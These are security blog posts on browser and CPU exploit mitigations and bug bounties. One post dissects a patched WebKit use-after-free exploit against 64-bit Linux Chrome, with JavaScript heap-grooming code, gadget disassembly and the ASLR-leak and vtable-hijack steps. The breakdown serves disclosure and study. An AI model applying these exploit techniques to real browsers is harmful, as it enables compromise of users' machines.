Thursday, June 5, 2014

Execute without read

A couple of years ago, during an idle moment, I wondered what we could do if we had a hardware CPU primitive for execute-only pages, i.e. pages with no read or write permission: https://twitter.com/scarybeasts/status/174901935340666881

It turns out that aarch64 has exactly such support. Here's support heading into the Linux kernel:

https://git.kernel.org/cgit/linux/kernel/git/cmarinas/linux-aarch64.git/commit/?h=upstream&id=bc07c2c6e9ed125d362af0214b6313dca180cb08
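
As a rough illustration (a minimal sketch, not tested against that patch), requesting such a mapping from userland would just be a plain mmap() asking for PROT_EXEC with neither PROT_READ nor PROT_WRITE:

    #include <sys/mman.h>
    #include <cstdio>

    int main() {
        // Ask for a page that can be executed but neither read nor written.
        // Historically, PROT_EXEC has implied readability on most hardware;
        // the aarch64 support above makes the no-read semantics real.
        void* p = mmap(nullptr, 4096, PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (p == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
        // Any attempt to read through p should now fault. (Of course, an
        // anonymous mapping like this contains no code to execute; real
        // usage would apply the protection to binary text.)
        return 0;
    }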

The original idea was to defeat ROP by having all of the instructions randomized a bit on a per-install basis. You know, the usual tricks such as applying equivalence transforms on the opcode stream. Such an approach would have some obvious downsides such as diagnosability and, let's face it, implementing it would also feel a bit hacky. Can we do better?

Maybe we can. The original idea focused on the attacker knowing where the binaries are in virtual address space, but not knowing or being able to read or otherwise predict the content. What if we instead keep the binary content stable but try and make sure the attacker cannot discern the location of the binaries? With enough ASLR entropy, this would be an interesting approach.

For the sake of the exercise, imagine the attacker has the most powerful of bugs: an arbitrary read/write primitive relative to an existing heap location. The attacker can follow heap pointers to the stack, the BSS, vtables, etc. At first, this sounds prohibitively hard to deal with. But for every way the attacker might try to leak the address of the binary, there currently seems to be a solution:

  • The heap is riddled with vtable pointers. If the attacker follows a vtable pointer, they get to read function pointers and the location of the binary is revealed. We can fix this in one of two ways: either get sneaky and turn vtables into code (jmp 0xblah) instead of data, reusing our exec-without-read primitive; or burn a register (aarch64 has lots) as storage for a secret ASLR base for the binary.
  • The heap is riddled with raw function pointers. We can redo function pointers as something like single-slot vtables and use the above trick. We don't want to store function pointers in writable memory as offsets relative to our secret register, because the attacker could then easily jump to an arbitrary point in the binary.
  • The BSS and data sections are typically stacked adjacent to the binary. We need to not do this, so that pointers into the BSS and data sections do not reveal the location of the binary.
  • The stack contains saved return addresses. These return addresses reveal the address of the binary. And for sure, the heap will contain pointers to the stack from time to time. Separating your stack into control flow and data will sort this out -- perhaps burning another register to keep the control flow stack separate and at a secret location.
  • JIT engines are a pain. And your heap is going to contain chains of pointers leading to the JIT pages. Depending on the type of JIT engine, there are various tricks that can be pulled. Enumerating them here would make the post too long. Some of the more amusing tricks include having the kernel ban syscalls issued from a writable page.
Perhaps at this point we decide that the hacks are piling up and add an indirection to all indirect jumps that uses a secret register for the binary location, and an offset into a table of valid jump locations. (I think this may be where @comex was heading in a tweet in a discussion today: https://twitter.com/comex/status/474656633281196032)
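
To make the indirection concrete, here's a minimal C++ sketch (the table, names and bounds check are all invented for illustration; a real implementation would keep the table base in a reserved register and host the table behind the unreadable boundary):

    #include <cstdio>
    #include <cstddef>

    // All valid indirect-call targets live in one table. In the scheme
    // above, its address sits in a reserved register rather than a symbol
    // the attacker can locate by walking heap pointers.
    static void say_hello() { std::puts("hello"); }
    static void say_bye()   { std::puts("bye"); }

    using Fn = void (*)();
    static const Fn kJumpTable[] = { say_hello, say_bye };

    // Writable heap objects store only a small index -- never a raw code
    // pointer -- so an arbitrary-read attacker learns nothing about the
    // binary's location by following heap pointers.
    struct Callback { std::size_t index; };

    static void invoke(const Callback& cb) {
        // A corrupted index cannot escape the set of valid jump targets.
        if (cb.index < sizeof(kJumpTable) / sizeof(kJumpTable[0]))
            kJumpTable[cb.index]();
    }

    int main() {
        Callback cb{0};
        invoke(cb);  // calls say_hello via the indirection
    }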

Such a system isn't going to be invulnerable to memory corruption, but it _is_ going to be a significant pain to attack. The most obvious remaining attack is probably to read a couple of different vtable pointers and interchange them, calling an arbitrary attacker-chosen _existing function_ in the binary. If your binary has function pointers to system() in the heap, you're going to be in trouble. But generally, going after the kernel is going to be hard. Valid functions in your binary are unlikely to have the side effect of calling syscalls with bad parameters.

We also find ourselves wondering if we've sort-of re-implemented something like NaCl, although the performance characteristics and granularity of attacker-chosen code blocks will be different.

Crazy idea? Plausible direction?

[Thanks to Lee Campbell for helping with discussions and this blog post]

Friday, March 21, 2014

Together, we can make a difference

A couple of weeks back, I released a popular spreadsheet which lists many of the Adobe Flash Player 0-days used to harm people in the wild since 2010. I counted 18, and countless kind Twitterers pointed out some I may have missed. It was an interesting exercise, of course with an ulterior motive!

Looking beyond the raw counts, the spreadsheet shouts two items:
  • We should want to make a difference. The harm done from all these 0-days is just a litany of awfulness. We have harm to democracy activists and the human rights organizations that try to help these people. We have harm to American defense interests, aka. espionage. We have harm to corporations, aka. theft and economic damage.
  • We can make a difference! If you look at the data, you'll see 7 memory corruption 0-days in a year, starting mid-2010. After this year, Tavis Ormandy's famous Flash security rampage landed (80+ fixes), with follow-up patches such as 7 fixes here. Almost a year then passes between Flash memory corruption 0-days after Tavis' work. You should call him a hero. (You should call Mateusz Jurczyk, Gynvael Coldwind and Fermin Serna heroes too. They continued Tavis' work; have a look at the CVE count in this Adobe advisory to appreciate it.)
Whilst it's true that Flash 0-days have seen a resurgence in Dec 2013 - Feb 2014, this does not invalidate the data showing that the whitehat community made a difference from 2010 - 2011 onwards. If anything, the data suggests that attackers have regrouped and refocused their research efforts to target areas that are still fertile. We can certainly do the same and put down this resurgence.

How you can help make a difference

Join us in the whitehat world. When you entered the greyhat world, they told you you'd be helping catch terrorists, didn't they? Recent and ongoing revelations show that no, in fact the biggest use of your work was enabling mass surveillance, the compromise of foreign nations and even the compromise of foreign corporations. If you want to make an actual difference, see above for where defensive help is needed.

Join us working on Flash and other important software. Many of us are working hard to provide reasonable avenues of reward for those who work on important software in the whitehat community. For example, the Internet Bug Bounty includes Flash as a category. For Flash vulnerabilities where exploitability is near-certain, we're rewarding up to $10,000 -- we have rewarded at this level three times already. We also anticipate $5,000 as a popular reward level for vulnerabilities that are likely exploitable but not proven. I previously blogged about a $10,000 example here.

What are you waiting for? Join us and we'll make a difference. You'll get some good coin as a side-effect.

Thursday, February 20, 2014

Internet Bug Bounty issues its first $10,000 reward

One of my side projects is as an adviser and panelist for the non-profit Internet Bug Bounty (IBB). We recently added Adobe Flash Player to the scope for rewards.

Earlier today, David Rude collected $10,000 for a vulnerability recently fixed in APSB13-28. My thoughts on this are too long to fit into a tweet, so I summarize them here:

  • This shows that the IBB is serious about rewarding research which makes us all safer. $10,000 is a respectable reward by modern bug bounty program standards. It also shows that when we give the reward range as "$2000 - $5000+", we are serious about that little plus character!
  • David Rude is a hero. This vulnerability was found being exploited in the wild. Recent research by Citizen Lab has linked the exploit to a morally dubious company, the targeting of journalists, and regimes with poor human rights records. Getting this bug fixed is a service to all internet users, democracy and human rights.
  • The IBB culture is to err on the side of paying. Note that David did not discover the vulnerability himself; he discovered someone else using it. IBB culture is to look mainly at whether a given discovery or piece of research helped make us all safer. Our aim is to motivate and incentivize any high-impact work that leads to a safer internet for all.
  • The vulnerability was never in fact reported to IBB! Wait, wut? It's true. The vulnerability went via Adobe's standard channels. IBB does not want or need details of unfixed vulnerabilities -- that would violate strict need-to-know handling. Once a public advisory and fix is issued, researchers or their friends may file IBB bugs to nominate their bugs for reward. Or, for important categories such as Flash or Windows / Linux kernel bugs, panel members keep an eye out for high impact disclosures and nominate on the researchers' behalf. Because we care.
Join us for the common good of a safer internet. You can help by doing your research in the open, targeting high-impact vulnerabilities or even becoming a new corporate sponsor. If we all pull together we can make a difference.

Sunday, December 29, 2013

vtable protections: fast and thorough?

Recently, there's been a reasonable amount of activity in the vtable protection space. Most of it is compiler-based. For example, there's the GCC-based virtual table verification, aka. VTV. There are also multiple experiments based on clang / LLVM and of course MSVC's vtguard. In the non-compiler space, there's Blink's heap partitioning, enabled by PartitionAlloc.

It seems, though, that these various techniques require the user to choose between "fast" or "thorough protection". This isn't ideal. Shortly, I'll document my own idea for how to try and get both fast and thorough. But first, a recap on what we mean by fast and thorough.

Fast vtable protection

Protecting vtables typically involves inserting machine instructions around vtable pointer loads or virtual calls. Going fast is simple: only insert a very small number of fast instructions (i.e. no hard-to-predict branches). This is the approach taken by vtguard. If you look at page 14 in the vtguard PDF linked above, you'll see that there's just a single cmp and a single jne (short, and never taken in normal execution) added to the hot path.
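
For a feel of the shape of such a check, here's a hypothetical C++ rendering (not vtguard's actual codegen; the secret's symbol name and the guard slot are invented):

    // Every valid vtable carries a per-image secret at a known slot, and
    // the call site compares it before trusting the vtable.
    extern "C" const void* __vtguard_secret;  // hypothetical secret symbol

    struct Object {
        const void* const* vtable;
    };

    inline void vtguard_check(const Object* obj, unsigned guard_slot) {
        // Compiles down to a single cmp plus a short, never-taken jne.
        if (obj->vtable[guard_slot] != __vtguard_secret)
            __builtin_trap();  // fail fast on mismatch
    }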

Tangentially, another task commonly undertaken when adding vtable protections to a given program is to remove as many virtual calls as possible, by annotating classes and methods with the "final" keyword and/or applying whole-program optimizations.

Thorough vtable protection

Describing what we want in a thorough vtable protection is a little more involved. We want:

  • Defeating ASLR does not defeat the vtable check. (vtguard lacks this property, whereas the GCC implementation has it.)
  • Only a valid vtable pointer can be used.
  • Furthermore, only a vtable pointer corresponding to the correct hierarchy for the call site can be used. 
  • Ideally, only a vtable pointer corresponding to the correct hierarchy level for the call site can be used.

A fast solution for thorough vtable protection?

How can we get all of the protections above and get them fast? My idea revolves around separating the problem into two pieces:

  1. Work out whether we can trust the vtable pointer or not.
  2. Validate that the class type represented by the vtable pointer is appropriate for the call site.

To trust or not to trust?

Current schemes trust the vtable pointer or not based on some secret (vtguard, the xor-based LLVM approach), on a fixed table of valid values (GCC, some LLVM approaches), or by constraining the values that might appear in the vtable position (heap partitioning).

The new scheme would be to reserve a certain portion of the address space for vtables. We know that nothing else can be mapped there, so by suitably masking any proposed vtable pointer, we know it is valid. I haven't fully thought this through for 32-bit, but look at this 64-bit variant:
  • Host vtables in the lower 4GB of address space.
  • Use the dereference of a 32-bit register to load the vtable entry. This provides masking for free and even saves a byte in the instruction sequence. It works because loading 4 bytes into a 64-bit register zero-extends the result (see the sketch after this list).
  • Optionally, save memory by having the compiler use 4-byte vtables.
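
A minimal sketch of that load in C++ (the object layout is hypothetical; in reality this lives in the compiler's codegen):

    #include <cstdint>

    // Hypothetical object layout: the vtable "pointer" is stored as a
    // 4-byte value, which also delivers the optional memory saving.
    struct Object {
        uint32_t vtable_offset;
    };

    using VFunc = void (*)(Object*);

    void virtual_call(Object* obj, unsigned slot) {
        // The 32-bit load zero-extends into 64 bits, so whatever an
        // attacker wrote into the object, the resulting address stays
        // inside the low 4GB reserved for vtables: masking for free.
        uint64_t vtable = obj->vtable_offset;
        VFunc* table = reinterpret_cast<VFunc*>(vtable);
        table[slot](obj);
    }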

This scheme is approximately free, maybe even performance positive in some situations. Furthermore, one possible implementation is to stop somewhere around here for a very fast protection scheme that is "ok" in thoroughness.

On the downside, you've lost the 64-bit invariant that "nothing is mapped in the bottom 4GB", but the percentage of space used is going to be small. If that bothers us, then we can use the same trick to load a 4-byte vtable pointer and then "or" it with 0x100000000 (use bts if you dare) or some other value.
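
That variant might look like this (again a sketch; 0x100000000 as the reservation base is an assumption):

    #include <cstdint>

    // Keep the bottom 4GB unmapped: zero-extend the 4-byte value, then
    // OR in a fixed bit so vtables live in the 4GB - 8GB range instead.
    void* const* vtable_address(uint32_t vtable_offset) {
        uint64_t addr = static_cast<uint64_t>(vtable_offset) | 0x100000000ULL;
        return reinterpret_cast<void* const*>(addr);
    }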

Validating class type

Once you know you trust your vtable pointer, validating the class type becomes a lot simpler. Instead of messing with secrets inside the vtable, you can just store a compact representation of the class type inside the vtable, with the aim of satisfying validation needs with a single compare.

The one trick we want to play is to make it easy to validate various different positions in a class hierarchy with minimal work. To do this, we can store class details in a hierarchical format. To take a simple case, imagine that we have the following classes in the system:

A1, A1:B1, A2, A2:B1, A2:B1:C1

We encode these using one byte per hierarchy level, the basemost class being the LSB (values in hex): 00000001, 00000101, 00000002, 00000102, 00010102. (Note that this will be an approximation. For example, if you have more than 256 basemost classes with virtual functions, you would need to represent the first level with 2 or more bytes.)

Finally, our "is this object of the correct type for the callsite?" check becomes a simple compare. Depending on the position in the hierarchy, we may be able to achieve the compare with no masking and therefore a single instruction.

For example, for a call site expecting an object of type A1, it's just "cmpb $1, (%eax)". That's a 4-byte sequence, which is much shorter than the 10-byte sequence noted in the vtguard PDF. For a call site expecting an object of type A2:B1, it's "cmpw $0x102, (%eax)".
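
Here's the same logic in C++, as a sketch (type-id values taken from the example above; the function names are invented):

    #include <cstdint>
    #include <cassert>

    // One byte per hierarchy level, basemost class in the LSB.
    constexpr uint32_t kTypeA1     = 0x00000001;  // A1
    constexpr uint32_t kTypeA1B1   = 0x00000101;  // A1:B1
    constexpr uint32_t kTypeA2B1   = 0x00000102;  // A2:B1
    constexpr uint32_t kTypeA2B1C1 = 0x00010102;  // A2:B1:C1

    // "Is this object valid for a call site expecting A2:B1?" is a
    // masked compare of the low two bytes -- the cmpw above.
    bool valid_for_A2B1_callsite(uint32_t type_id) {
        return (type_id & 0xffff) == kTypeA2B1;
    }

    int main() {
        assert(valid_for_A2B1_callsite(kTypeA2B1));    // exact type: ok
        assert(valid_for_A2B1_callsite(kTypeA2B1C1));  // derived C1: ok
        assert(!valid_for_A2B1_callsite(kTypeA1B1));   // wrong hierarchy: rejected
    }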

Closing notes

Will it work well? Who knows. I haven't had time to implement this, nor am I likely to in the near future. Feel free to take this and run with it.

Note that this idea doesn't cover what to do with raw function pointer calls. If you want to head towards complete control flow integrity, you'll want to look at protecting those, as well as return addresses (the current canary-based stack defenses do nothing against an arbitrary read/write primitive).

Sunday, February 3, 2013

Exploiting 64-bit Linux like a boss

Back in November 2012, a Chrome Releases blog post mysteriously stated: "Congratulations to Pinkie Pie for completing challenge: 64-bit exploit".

Chrome patches bugs and autoupdates pretty fast, but this is a WebKit bug and not every consumer of WebKit patches bugs particularly quickly. So I've waited a few months to release a full breakdown of the exploit. The exploit is notable because it is against 64-bit Linux. 64-bit exploits are generally harder than 32-bit exploits for various reasons, including the fact that some types of heap sprays are off the table. On top of that, Linux ASLR is generally better than Windows ASLR (although not perfect). For example, Pinkie Pie's Pwnium 2 exploit defeated Win 7 ASLR by relying on a statically-addressed system object! That sort of nonsense is generally absent from Linux ASLR.

Without any further ado, I'll paste my raw notes from the exploit deconstruction below. The number of different techniques used and steps involved is quite impressive.

The bug
A single WebKit use-after-free bug was used to gain code execution. The logic flaw in WebKit was reasonably simple: when a WebCore::HTMLVideoElement is garbage collected, the base class member WebCore::HTMLMediaElement::m_player -- a WebCore::MediaPlayer -- is freed. A different object, a WebCore::MediaSource, holds a stale pointer to the freed WebCore::MediaPlayer. The stale pointer can be prodded indirectly via Javascript methods on either the JS MediaSource object, or JS SourceBuffer objects owned by the JS MediaSource.

The exploit
The exploit is moderately complicated, with multiple steps and techniques used. Pinkie Pie states that the complexity is warranted, and generally caused by lack of control, and therefore limited options for making progress, at each stage.

The exploit steps are as follows:

1. Allocate a large number of RTCIceCandidate objects (100000) and then unreference a small subset of them.
   tempia = new Uint32Array(176/4);
   rtcs = [];
   rtcstring = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
   rtcdesc = {'candidate': rtcstring, 'sdpMid': rtcstring}
   for(var i = 0; i < 100000; i++) {
       rtcs.push(new RTCIceCandidate(rtcdesc));
   }
   for(var i = 0; i < 10000; i++) rtcs[i] = null;
   for(var i = 90000; i < 100000; i++) rtcs[i] = null;

This step indirectly creates a lot of WebCore::WebCoreStringResource (v8 specific) objects and a later garbage collection will free some subset of them.
These objects are 24 bytes in size (fitting into a tcmalloc slab of 32 byte sized allocations), so it means that any future 24 byte allocation has a large probability of being placed directly before a WebCore::WebCoreStringResource object. This is significant later.
A 176-byte sized buffer is also allocated.

2. Trigger free of MediaPlayer and the 176-byte sized buffer; allocate another MediaSource object.
   buffer = ms.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid.parentNode.removeChild(vid);
   vid = null;
   gc();
   tempia = null;
   gc();
   ms2 = new WebKitMediaSource();

   sbl = ms2.sourceBuffers;
The WebCore::MediaPlayer is 264 bytes in size (tcmalloc bucket 257 - 288). When it is freed, many child objects are also freed. The only important one is a 168 byte sized WebKit::WebMediaPlayerClientImpl object (tcmalloc bucket 161 - 176).
Allocation of the WebCore::MediaSource (176 bytes) also subsequently allocates a WebCore::SourceBufferList child object (168 bytes). The free of the temporary 176 byte buffer (tempia) is to ensure that its freed slot is used for the WebCore::MediaSource object, leaving the freed slot that was occupied by a WebKit::WebMediaPlayerClientImpl to be occupied by a new WebCore::SourceBufferList object.

3. Call vtable of freed WebMediaPlayerClientImpl.
   buffer.timestampOffset = 42; // free
In C++, this triggers the call chain WebCore::SourceBuffer -> WebCore::MediaSource -> WebCore::MediaPlayer -> (virtual) WebKit::WebMediaPlayerClientImpl.
You’ll notice that the call chain bounces through the WebCore::MediaPlayer, which is freed. However, the only access is to the WebCore::MediaPlayer::m_private member at offset 72. delete’ing the object only interferes with the first 16 bytes (on account of tcmalloc writing two freelist pointers) and the WebCore::MediaPlayer::m_mediaPlayerClient member. The WebCore::MediaPlayer free slot isn’t otherwise meaningfully re-used by this point.

What happens next is fascinating. WebCore::MediaPlayer::sourceSetTimestampOffset disassembles to:
   0x00007f61a0ced4c0 <+0>: mov    rdi,QWORD PTR [rdi+0x48]
   0x00007f61a0ced4c4 <+4>: mov    rax,QWORD PTR [rdi]
   0x00007f61a0ced4c7 <+7>: mov    rax,QWORD PTR [rax+0x208]
   0x00007f61a0ced4ce <+14>: jmp    rax

This loads the vtable for the WebCore::MediaPlayer::m_private member and calls the vtable function at 0x208. WebCore::MediaPlayer::m_private is supposed to be a WebKit::WebMediaPlayerClientImpl object but a WebCore::SourceBufferList was overlayed there. WebCore::SourceBufferList objects have a vtable, but a much smaller one! Offset 0x208 in this vtable hits a vtable function in a totally different vtable, specifically WebCore::RefCountedSupplement::~RefCountedSupplement, which disassembles to:
   0x00007ffd9ec51e00 <+0>: lea    rax,[rip+0x3276969]
   0x00007ffd9ec51e07 <+7>: mov    QWORD PTR [rdi],rax
   0x00007ffd9ec51e0a <+10>: jmp    0x7ffd9e5b2c80 <WTF::fastFree(void*)>

As these opcodes execute, rdi is a this pointer for a WebCore::SourceBufferList object (which the calling code believed was a this pointer to a WebKit::WebMediaPlayerClientImpl object). As you can see, the side effects of these opcodes are:
- Trash the vtable pointer of the WebCore::SourceBufferList object.
- Do a free(this), i.e. free the WebCore::SourceBufferList object.
- Return cleanly to the caller.

4. Use HTML5 WebDatabase functionality to allocate a SQLStatement as a side effect.
   transaction.executeSql('derp', [], function() {}, function() {});
   slength = sbl.length;
A WebCore::SQLStatement object is 176 bytes in size. So it is allocated into the slot just vacated by free’ing the WebCore::SourceBufferList object in step 3 above. This is the same slot that we free’d the WebKit::WebMediaPlayerClientImpl from.
There are now two Javascript objects pointing to freed objects: a direct handle to a freed WebCore::SourceBufferList (sbl) and an indirect handle to a freed WebKit::WebMediaPlayerClientImpl (buffer).
At this time, a call is made in Javascript to sbl.length. It is not required for the exploit and nothing is done with the integer result, but looking at this call under the covers is instructive.
To return the length, a 64-bit size_t is read from offset 136 into the WebCore::SourceBufferList object. Since a WebCore::SQLStatement was put on top of the freed WebCore::SourceBufferList, the actual value read is a WebCore::SQLStatement::m_statementErrorCallbackWrapper::m_callback member pointer. Leaking this value to Javascript might be useful as it is a heap address. However, Javascript lengths are 32-bit so only the lower 32-bits of the address are leaked. The entropy that’s important for ASLR on 64-bit Linux is largely in the next 8 bits above the bottom 32 bits, so the heap address cannot be usefully leaked!
Exploitation of similar overlap situations would not be a problem on systems with 32-bit pointers.

5. Abuse overlapping fields in SourceBufferList vs. SQLStatement.
   sb = sbl[0xa8/8];
Next, the Javascript array index operator is used. At this time, the Javascript handle to the WebCore::SourceBufferList is actually backed by a WebCore::SQLStatement object at the C++ level. The WebCore::SourceBufferList::m_list member is a WTF::Vector and that starts with two important 64-bit fields: a length and a pointer to the underlying buffer.
As covered above, the length now maps to a pointer value. A pointer value, when treated as an integer, will be very large, effectively sizing the vector massively. And the vector’s underlying buffer pointer now maps to the member SQLStatement::m_statementErrorCallbackWrapper::m_scriptExecutionContext.

Therefore, the Javascript array operator on JS SourceBufferList will return a JS SourceBuffer object which is backed in C++ by a pointer pulled from somewhere in a C++ WebCore::ScriptExecutionContext object, depending on the array index.

The exploit uses array index 21, which corresponds to offset 168, or WebCore::ScriptExecutionContext::m_pendingExceptions. This is a pointer to a WTF::Vector. So, there is now a Javascript handle to a JS SourceBuffer object which is really backed by a WTF::Vector.

6. Read vtable value as a Javascript number.
   converterF64[0] = sb.timestampOffset;
In C++, the timestampOffset property is read from a 64-bit double at offset 32 of the WebCore::SourceBuffer object. The WebCore::SourceBuffer object is currently backed by a WTF::Vector object, which is 24 bytes in size and lives in a 32 byte tcmalloc slot. Therefore, a read at offset 32 will in fact read from the beginning of the next tcmalloc slot. Looking back to step 1, it was arranged to be likely that the adjacent 32 byte slot will contain a WebCore::WebCoreStringResource object. Therefore, the WebCore::WebCoreStringResource vtable is read and returned to Javascript as a number. Javascript numbers are 64-bit doubles so there are no truncation issues like those discussed with reading an integer length above in step 4.
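
The mechanics of getting at those leaked bits (the exploit's converterF64 / converterI32 pair) are just type punning between a 64-bit double and integer views of the same storage. A C++ equivalent of the idea, as a sketch:

    #include <cstdint>
    #include <cstring>

    // A Javascript number is a 64-bit double, so an 8-byte vtable
    // pointer read as a double survives bit-for-bit; viewing the same
    // storage as integers (as the exploit's converter typed arrays do)
    // recovers the pointer value.
    uint64_t double_bits(double leaked) {
        uint64_t bits;
        std::memcpy(&bits, &leaked, sizeof(bits));
        return bits;
    }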

That’s a lot of effort, but finally the exploit has leaked a vtable value to Javascript. For a given build of Chrome, it is now easy to calculate the exact address of all opcodes, functions, etc. in the binary.

7. Re-trigger use-after-free and back freed object with array buffer.
   buffer2 = ms3.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid2.parentNode.removeChild(vid2);
   vid2 = null;
   gc();
   var ia = new Uint32Array(168/4);
   rtc2 = new webkitRTCPeerConnection({'iceServers': []});
This time, the freed WebKit::WebMediaPlayerClientImpl is replaced with a 168-byte raw buffer that can be read and written through Javascript. This is now a useful primitive because ASLR was defeated and a useful vtable pointer value can be put in the first 8 bytes of the raw buffer.
A WebCore::RTCPeerConnection is also allocated (264 bytes) to occupy the slot for the freed WebCore::MediaPlayer. This protects the freed WebCore::MediaPlayer from corruption. Significantly, it makes sure nothing overwrites the WebCore::MediaPlayer::m_private pointer. This pointer is needed intact. It is at offset 72 and WebCore::RTCPeerConnection does not overwrite that field during construction.

8. Leak address of a heap buffer under Javascript control.
   add64(converterI32, 0, converterI32, 0, -prepdata['found_vt']);
   add64(ia, 0, converterI32, 0, prepdata['mov_rdx_112_rdi_pp']);
   add64(ia, 0, ia, 0, -0x1e8);
   var ib8 = new Uint8Array(0x10000);
   var ib = new Uint32Array(ib8.buffer);
   buffer2.append(ib8);
   var ibAddr = [ia[112/4], ia[112/4 + 1]];
Using knowledge of the binary layout, a vtable value is chosen that will result in the WebCore::MediaPlayer::sourceAppend vtable call site calling the function v8::internal::HStoreNamedField::SetSideEffectDominator. An appropriate function name. It disassembles to:
   0x00007f153efd7340 <+0>: mov    QWORD PTR [rdi+0x70],rdx
   0x00007f153efd7344 <+4>: ret    
As can be seen, the value of rdx (the 2nd non-this function parameter) is written to offset 112 of this. Here, this is backed by a raw buffer pointer for the ia Javascript Uint32Array, and rdx in the context of WebCore::MediaPlayer::sourceAppend is a raw buffer pointer for the ib Javascript Uint32Array.
Therefore, the address of a heap buffer under the control of Javascript has been leaked to Javascript.

9. Proceed as normal.
The exploit now has control over a vtable pointer. It can point the vtable pointer at a heap buffer where the contents can be controlled arbitrarily. The exploit is free to start ROP chains etc.
As it happens, the exploit payload is expressed in terms of valid full function calls. This is achieved by bouncing into a useful sequence of opcodes in a base::internal::Invoker<3> template instantiation:
   0x00007f153fc71d40 <+0>: mov    rax,rdi
   0x00007f153fc71d43 <+3>: lea    rcx,[rdi+0x30]
   0x00007f153fc71d47 <+7>: mov    rsi,QWORD PTR [rdi+0x20]
   0x00007f153fc71d4b <+11>: mov    rdx,QWORD PTR [rdi+0x28]
   0x00007f153fc71d4f <+15>: mov    rax,QWORD PTR [rax+0x10]
   0x00007f153fc71d53 <+19>: mov    rdi,QWORD PTR [rdi+0x18]
   0x00007f153fc71d57 <+23>: jmp    rax
As can be seen, these opcodes pull a jump target, a new this pointer and two function arguments from the current this pointer. A very useful construct.
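
Reading the offsets out of the disassembly, the fake this object the exploit lays out in its controlled buffer would look something like this (a sketch of the layout, not the exploit's actual code):

    #include <cstdint>

    // Offsets taken from the Invoker<3> gadget above.
    struct FakeThis {
        uint64_t unused0;      // +0x00
        uint64_t unused1;      // +0x08
        uint64_t jump_target;  // +0x10 -> loaded into rax, then jmp rax
        uint64_t new_this;     // +0x18 -> becomes rdi
        uint64_t arg1;         // +0x20 -> becomes rsi
        uint64_t arg2;         // +0x28 -> becomes rdx
    };

Pointing new_this at a further record of the same shape would allow chaining one call into the next.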

Monday, September 24, 2012

The joys and hazards of multi-process browser security

Web browsers with some form of multi-process model are becoming increasingly common. Depending on the exact setup, there can be significant consequences for security posture and exploitation methods.

Spray techniques

Probably the most significant security effect of multi-process models is the effect on spraying. Spraying, of course, is a technique where parts of a process's heap or address space are filled with data helpful for exploitation. It's sometimes useful to spray the heap with a certain pattern of data, or spray the address space in general with executable JIT mappings, or both.

In the good ol' days, when every part of the browser and all the plug-ins were run in the same process, there were many possible attack permutations:

  • Spray Java JIT pages to exploit a browser bug.
  • Spray Java JIT pages to exploit a Flash bug.
  • Spray Flash JIT pages to exploit a browser bug.
  • Spray Java JIT pages to exploit Java.
  • You could even spray browser JS JIT pages to exploit Java if you wanted to ;-)
  • ...etc.

Since the good ol' days, various things happened to lock all this down:

  • The Java plug-in was rearchitected so that it runs out-of-process in most browsers.
  • IE and Chromium placed page limits on JavaScript-derived JIT pages (covered a little in the famous Accuvant paper).
  • Firefox introduced its out-of-process plug-ins feature (for some plug-ins, most notably Flash) and Chromium had all plug-ins out-of-process since the first release.

The end result is trickier exploitation, although it's worth noting that one worrisome combination remains: IE still runs Flash in-process, and this has been abused by attackers in many of the recent IE 0-days.

One-shot vs. multi-shot

The terms "one-shot" and "multi-shot" have long been used in the world of server-side exploitation. "One-shot" refers to a service that is dead after just one crash -- so your exploit had better be reliable! "Multi-shot" refers to a service whereby it remains running after your lousy exploit causes a crash. This could be because the service has a parent process that launches new children if they die or it could simply be because the service is launched by a framework that automatically restarts dead services.

Although moving to a multi-process browser is generally a very positive thing for security and stability, you do run the risk of introducing "multi-shot" attacks.

In other words, let's say your exploit isn't 100% reliable. Wouldn't it be nice if you could just use a bit of JavaScript to run the exploit over and over in a child process until it works? Perhaps you simply weren't able to defeat ASLR and you're in the situation where you have a 1/256 chance of your hard-coded address being correct. Again, this could be brute-forced in a "multi-shot" attack.

The most likely "multi-shot" attacks are against plug-ins that are run out-of-process, or against browser tabs, if browser tabs can have separate processes.

These attacks can be defended against by limiting the rate of child process crashes or spawns. Chromium deploys some tricks in this area.
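
One plausible shape for such a defense, as a sketch (the class and threshold are invented for illustration, not Chromium's actual logic):

    #include <chrono>
    #include <cstddef>
    #include <deque>

    // Refuse to relaunch a crashing child more than a few times per
    // minute, turning a would-be "multi-shot" brute force back into
    // something much closer to one-shot.
    class RespawnLimiter {
        std::deque<std::chrono::steady_clock::time_point> crashes_;
      public:
        bool may_respawn(std::size_t max_per_minute = 5) {
            auto now = std::chrono::steady_clock::now();
            // Forget crashes older than the window.
            while (!crashes_.empty() &&
                   now - crashes_.front() > std::chrono::minutes(1))
                crashes_.pop_front();
            if (crashes_.size() >= max_per_minute) return false;
            crashes_.push_back(now);
            return true;
        }
    };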

Broker escalation

Once an attack has gained code execution inside a sandbox, there are various directions it might go next. It might attack the OS kernel. Or for the purposes of this discussion, it might attack the privileged broker. The privileged broker typically runs outside of the sandbox, so any memory corruption vulnerability in the broker is a possible avenue for sandbox escape.

To attack the memory corruption bug, you'll likely need to defeat DEP / ASLR in the broker process. An interesting question is: how far along are you already, by virtue of having code execution in the sandboxed process? Obviously, you know the full memory map layout of the compromised sandboxed process.

The answer is: it depends on your OS and the way the various processes relate to each other. The situation is not ideal on Windows; due to the way the OS works, certain system-critical DLLs are typically located at the same address across all processes. So ASLR in the broker process is already compromised to an extent, no matter how the sandboxed processes are created. I found this interesting.

The situation is better on Linux, where each process can have a totally different address space layout, including system libraries, executable, heap, etc. This is taken advantage of by the Chromium "zygote" process model for the sandboxed processes. So a compromise of a sandboxed process does not give any direct details about the address space layout of the broker process. There may be ways to leak it, but not directly, and /proc certainly isn't mapped in the sandboxed context! All this is another reason I recommend 64-bit Linux running Chrome as a browsing platform.

Wednesday, July 4, 2012

Chrome 20 on Linux and Flash sandboxing

[Very behind on blog posts so time to crank some out]

A week or so ago, Chrome 20 was released to the stable channel. There was little fanfare and even the official Chrome blog didn't have much to declare apart from bugfixes.

There were some things going on under the hood for the Linux platform, though. Security things, and some of them I implemented and am quite excited by.

